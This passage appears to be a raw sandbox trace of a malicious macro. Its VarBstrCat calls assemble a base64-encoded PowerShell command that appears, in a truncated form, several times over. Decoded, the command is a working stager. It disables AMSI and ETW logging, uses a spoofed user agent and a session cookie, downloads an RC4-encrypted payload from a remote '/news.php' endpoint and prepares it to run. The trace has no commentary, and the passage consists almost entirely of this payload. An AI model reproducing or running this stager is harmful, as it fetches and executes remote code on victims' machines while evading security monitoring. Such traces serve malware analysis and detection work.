LQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAcgBBACUAMABWAEMASgBYAEYAVwB1AFkASwAxAEUAbwBsAEcAQgA4ADcAIQA9AGQARABbAE0AfgBOAF0ALAAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AdABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAHgAbwByACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAQQB5AFIAQwBvAGoAcABzAGgAbwBXAGsAdQB5AD0ASwA2ADUAYgBYAEMARgBGAHMAKwBHAGgA", bstrRight="NwBXAHcAYwBmAGYAcQBDAGsAbwBQAE0AcAAxAGMAPQAiACkAOw", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.841] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAcgBBACUAMABWAEMASgBYAEYAVwB1AFkASwAxAEUAbwBsAEcAQgA4ADcAIQA9AGQARABbAE0AfgBOAF0ALAAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AdABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAHgAbwByACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAQQB5AFIAQwBvAGoAcABzAGgAbwBXAGsAdQB5AD0ASwA2ADUAYgBYAEMARgBGAHMAKwBHAGgANwBXAHcAYwBmAGYAcQBDAGsAbwBQAE0AcAAxAGMAPQAiACkAOw", bstrRight="AkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABE", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.842] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAcgBBACUAMABWAEMASgBYAEYAVwB1AFkASwAxAEUAbwBsAEcAQgA4ADcAIQA9AGQARABbAE0AfgBOAF0ALAAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AdABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAHgAbwByACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAQQB5AFIAQwBvAGoAcABzAGgAbwBXAGsAdQB5AD0ASwA2ADUAYgBYAEMARgBGAHMAKwBHAGgANwBXAHcAYwBmAGYAcQBDAGsAbwBQAE0AcAAxAGMAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABE", bstrRight="AGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAG", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.842] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAcgBBACUAMABWAEMASgBYAEYAVwB1AFkASwAxAEUAbwBsAEcAQgA4ADcAIQA9AGQARABbAE0AfgBOAF0ALAAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AdABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAHgAbwByACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAQQB5AFIAQwBvAGoAcABzAGgAbwBXAGsAdQB5AD0ASwA2ADUAYgBYAEMARgBGAHMAKwBHAGgANwBXAHcAYwBmAGYAcQBDAGsAbwBQAE0AcAAxAGMAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAG", bstrRight="QAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQA", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.842] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQB1AEEARABJAEEATQBnAEEANgBBAEQAZwBBAE0AQQBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAcgBBACUAMABWAEMASgBYAEYAVwB1AFkASwAxAEUAbwBsAEcAQgA4ADcAIQA9AGQARABbAE0AfgBOAF0ALAAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AdABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAHgAbwByACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAQQB5AFIAQwBvAGoAcABzAGgAbwBXAGsAdQB5AD0ASwA2ADUAYgBYAEMARgBGAHMAKwBHAGgANwBXAHcAYwBmAGYAcQBDAGsAbwBQAE0AcAAxAGMAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQA", bstrRight="YQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaA", 